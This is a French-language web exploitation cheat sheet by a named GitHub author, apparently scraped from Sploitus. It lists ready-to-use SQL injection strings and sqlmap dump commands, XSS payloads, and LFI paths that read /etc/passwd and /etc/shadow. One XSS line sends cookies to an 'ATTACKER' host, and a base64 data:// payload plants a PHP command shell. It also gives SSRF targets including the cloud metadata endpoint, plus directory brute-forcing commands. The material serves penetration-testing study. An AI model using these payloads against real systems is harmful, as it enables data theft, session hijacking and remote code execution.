web-exploitation-lab

Name: web-exploitation-lab
Rating: 5 (1 reviews)
2026-06-23 | CVSS 0.0
## https://sploitus.com/exploit?id=D00ABD7F-A3B6-5F61-A944-65E5960AB87E
# 🌐 Web Exploitation Lab

> Payloads, techniques et cheatsheet web — SQLi, XSS, LFI, SSRF — by [@ibramoha2](https://github.com/ibramoha2)

---

## 💉 SQL Injection

```sql
-- Test basique
' OR '1'='1
' OR 1=1--
" OR 1=1--
admin'--

-- Union based
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT table_name,NULL FROM information_schema.tables--

-- Error based
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--

-- Blind boolean
' AND 1=1--   (true)
' AND 1=2--   (false)

-- Time based
' AND SLEEP(5)--
'; WAITFOR DELAY '0:0:5'--  (MSSQL)
```

```bash
# SQLmap
sqlmap -u "http://target/page?id=1" --dbs
sqlmap -u "http://target/page?id=1" -D dbname --tables
sqlmap -u "http://target/page?id=1" -D dbname -T users --dump
sqlmap -u "http://target/" --data="user=admin&pass=test" --dbs
```

---

## 🔥 XSS — Cross-Site Scripting

```html

alert('XSS')




document.location='http://ATTACKER/steal?c='+document.cookie



alert(1)
alert`1`
">
javascript:alert(1)
```

---

## 📁 LFI — Local File Inclusion

```
# Linux fichiers sensibles
/etc/passwd
/etc/shadow
/etc/hosts
/var/log/apache2/access.log
/proc/self/environ

# Traversal classique
?page=../../../../etc/passwd
?page=....//....//....//etc/passwd

# Null byte (PHP < 5.3)
?page=../../../../etc/passwd%00

# PHP Wrappers
?page=php://filter/convert.base64-encode/resource=index.php
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
```

---

## 🔄 SSRF — Server-Side Request Forgery

```
# Accès réseau interne
http://localhost/admin
http://127.0.0.1:8080
http://169.254.169.254/latest/meta-data/  (AWS)

# Bypass filtres
http://127.1/
http://0.0.0.0/
http://[::1]/
http://0177.0.0.1/  (octal)

# Protocoles
file:///etc/passwd
dict://localhost:6379/  (Redis)
gopher://localhost:3306/  (MySQL)
```

---

## 🛠️ Outils

```bash
# Burp Suite — interception & repeater
# Nikto — scan vulnérabilités web
nikto -h http://target

# Gobuster — directory bruteforce
gobuster dir -u http://target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Ffuf — fuzzing
ffuf -u http://target/FUZZ -w wordlist.txt
```

---

**Auteur :** Mohamed Adoungouss Ibrahim | [@ibramoha2](https://github.com/ibramoha2) | Niger 🇳🇪